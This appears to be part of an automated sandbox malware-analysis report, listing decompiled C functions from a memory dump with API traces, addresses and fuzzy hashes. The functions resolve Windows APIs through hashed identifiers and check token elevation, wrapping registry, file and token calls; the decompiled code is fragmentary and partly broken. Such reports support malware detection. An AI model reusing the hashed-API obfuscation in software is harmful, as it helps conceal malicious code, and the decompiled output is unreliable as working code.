API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: 2808c74e96f21b119cf13ea906c2588d3141675f9ae637b42fe4bea5d0cb7701
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 7E21ADB0608206BEEB05DA28CC14FAF76ED9FD1204F10C82CB951D6290EF34D809C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 709A5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E709A5720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E709A2F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E7099F8C4(_a8, _t15);
							if(E709A2F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7099F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x709a5724
0x709a5725
0x709a5727
0x709a572c
0x709a5733
0x709a5737
0x709a5737
0x709a5737
0x709a573b
0x709a5781
0x709a5781
0x709a573d
0x709a573d
0x709a5743
0x709a574c
0x709a574f
0x709a5766
0x709a5777
0x709a5777
0x709a5779
0x709a577f
0x709a578a
0x709a57a2
0x709a57c2
0x709a57c2
0x709a57c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709a5743
0x709a57cc

APIs

RegQueryValueExA.KERNELBASE(?,709AD1F8,00000000,?,00000000,00000000,?,?,?,709AD1F8,?,709A57F3,?,00000000,00000000), ref: 709A5777
RegQueryValueExA.KERNELBASE(?,709AD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,709AD1F8,?,709A57F3,?,00000000), ref: 709A57C2

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: 4c70ef1c867b0e0b5d6d479d784baad5810b9c6705bb29c133884420a7d9ef4e
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 7B117FB1309315FFE6159E25DC80FAFB7EDDF81668F00451DB486A7140EA61EC00D6A6

Uniqueness

Uniqueness Score: -1.00%

Function 709A5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E709A5AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E7099D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E7099D78C(__ecx, _t66);
					E7099D0B4(_t58,  *_t66);
					E7099D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E709A621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E7099C328(_t40);
				if(E7099C33C(_t40) != 0) {
					_t58[2] = E709A352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E709A35D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x709a5aa8
0x709a5aab
0x709a5aac
0x709a5aaf
0x709a5ab1
0x709a5abe
0x709a5ac2
0x709a5ac6
0x709a5ad0
0x709a5ad7
0x709a5ad7
0x709a5ade
0x709a5ae0
0x709a5ae5
0x709a5aee
0x709a5af6
0x709a5af6
0x709a5ae7
0x709a5ae9
0x709a5ae9
0x709a5ae5
0x709a5afb
0x709a5b07
0x709a5b1d
0x709a5b1d
0x709a5c38
0x709a5b75
0x709a5b7e
0x709a5b7f
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1a
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x709a5bfe
0x709a5bff
0x709a5c06
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a71c6b898ba9aa26b741ec2e52b8d74a2266378031ea66bbfdcb7f2e12ffb612
Instruction ID: da0684f833e5e87595d56fc1cff345457146260a4b0a8b303a67b0e7d838b582
Opcode Fuzzy Hash: a71c6b898ba9aa26b741ec2e52b8d74a2266378031ea66bbfdcb7f2e12ffb612
Instruction Fuzzy Hash: EB3107F1344306BEE7512A758DC6F3F76AEEBC1249F10492CF94696086DE619D08C237

Uniqueness

Uniqueness Score: -1.00%

Function 709A5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E709A5B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E7099C328(_t24);
					if(E7099C33C(_t24) != 0) {
						_t33[2] = E709A352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E709A35D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x709a5b51
0x709a5b53
0x709a5b6a
0x709a5b75
0x709a5b7e
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x00000000
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2
0x709a5b55
0x709a5b55
0x709a5b5c
0x709a5bff
0x709a5c06
0x709a5c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 709A5BAA

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: 004555fc8b1135add72a4684cca9bd9db57a96f20de4d3c5acbd9ba335d41f93
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 9A0128F5780307BEE71116209C83F7FB76EEB82155F108869F94266085DF62A818C273

Uniqueness

Uniqueness Score: -1.00%

Function 709A5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E709A5B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7099C328(_t24);
				if(E7099C33C(_t24) != 0) {
					_t34[2] = E709A352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E709A35D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x709a5b29
0x709a5b2d
0x709a5b30
0x709a5b33
0x709a5b75
0x709a5b7e
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x709a5bff
0x709a5c06
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 709A5BAA

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: 033809960d38a4a5c3f63c6b3891d0aa875e06a22ade6e95dad93a3b678706d1
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: 2601D6F1380307BFEB1126108D42F7F76AEEFC2699F118869B98266096DF51AC08C133

Uniqueness

Uniqueness Score: -1.00%

Function 709A5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E709A5B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7099C328(_t24);
				if(E7099C33C(_t24) != 0) {
					_t34[2] = E709A352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E709A35D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x709a5b3d
0x709a5b44
0x709a5b47
0x709a5b75
0x709a5b7e
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x709a5bff
0x709a5c06
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 709A5BAA

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 99e4875957f927b8263e0b0e6b8d7dd960dac6951b14fd75d05a3dbbdc9c29d8
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: 9101FEF57403077FE71156218D82F7F766EDBC2155F104879B94265096DF659C18C133

Uniqueness

Uniqueness Score: -1.00%

Function 709A5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E709A5B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7099C328(_t23);
				if(E7099C33C(_t23) != 0) {
					_t31[2] = E709A352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E709A35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x709a5b1f
0x709a5b26
0x709a5b75
0x709a5b7e
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x709a5bff
0x709a5c06
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 709A5BAA

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: c055637f2e8ba009bc3d86f45f8b8e69448a3de9e9a961e7695a2caeb9251f4a
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: D901A4F1780307BFEB1256208D82F7F766EEB82659F104868B98665095DF65A918C133

Uniqueness

Uniqueness Score: -1.00%

Function 709A5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E709A5B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E709A2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7099C328(_t23);
				if(E7099C33C(_t23) != 0) {
					_t31[2] = E709A352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E709A2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E709A35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E709A2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x709a5b6d
0x709a5b71
0x709a5b75
0x709a5b7e
0x709a5b84
0x709a5b85
0x709a5b77
0x709a5b79
0x709a5b79
0x709a5b9b
0x709a5baf
0x709a5b9d
0x709a5baa
0x709a5bac
0x709a5bac
0x709a5bb1
0x709a5bb6
0x709a5bc4
0x709a5c2f
0x709a5c32
0x00000000
0x709a5bc6
0x709a5bcb
0x709a5c18
0x709a5c1c
0x709a5c26
0x709a5c26
0x709a5c1c
0x709a5bcd
0x709a5bd9
0x709a5bde
0x709a5beb
0x709a5bf2
0x709a5bfe
0x709a5bff
0x709a5c06
0x709a5bf4
0x709a5bf4
0x709a5bf5
0x709a5bf6
0x709a5bf8
0x709a5bfa
0x709a5bfb
0x709a5bfb
0x709a5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 709A5BAA

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: 796fe5deb239280a6a474b72fd80d09ee49dafb76a13f5259cac50b68668e0dc
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: CAF028F1380307BFEB1117208D82F3F766EEF82599F104868B94661086DF61A818C133

Uniqueness

Uniqueness Score: -1.00%

Function 709A5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E709A5D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E7099C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E709A2F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x709a5d80
0x709a5d81
0x709a5d83
0x709a5d89
0x709a5d8b
0x709a5d8f
0x709a5d8f
0x709a5d93
0x709a5d9f
0x709a5dd3
0x709a5dd3
0x00000000
0x709a5da1
0x709a5da6
0x709a5da7
0x709a5dbb
0x709a5dcc
0x709a5dbd
0x709a5dc8
0x709a5dc8
0x709a5dd1
0x709a5dd9
0x709a5ddb
0x709a5dde
0x709a5de3
0x709a5de3
0x709a5de7
0x709a5dec
0x00000000
0x00000000
0x00000000
0x709a5dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,709A5CB4,?,?), ref: 709A5DC8

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 367f729097493457c3d10c49d49cdcae12a3883f20ac28555b5df4de501329d4
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 4CF0F4B2B197127DD3515A38AC44B9FB7F9EFD1324F204B2DF582A61C4E7609840C6A7

Uniqueness

Uniqueness Score: -1.00%

Function 709A10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E709A10CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E709A2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x709a10da
0x709a10dc
0x709a10ea
0x709a10ee
0x709a1137
0x00000000
0x709a1137
0x709a10f3
0x709a10f4
0x709a10f6
0x709a10fb
0x00000000
0x709a1114
0x709a1118
0x709a1125
0x709a1129
0x00000000
0x00000000
0x00000000
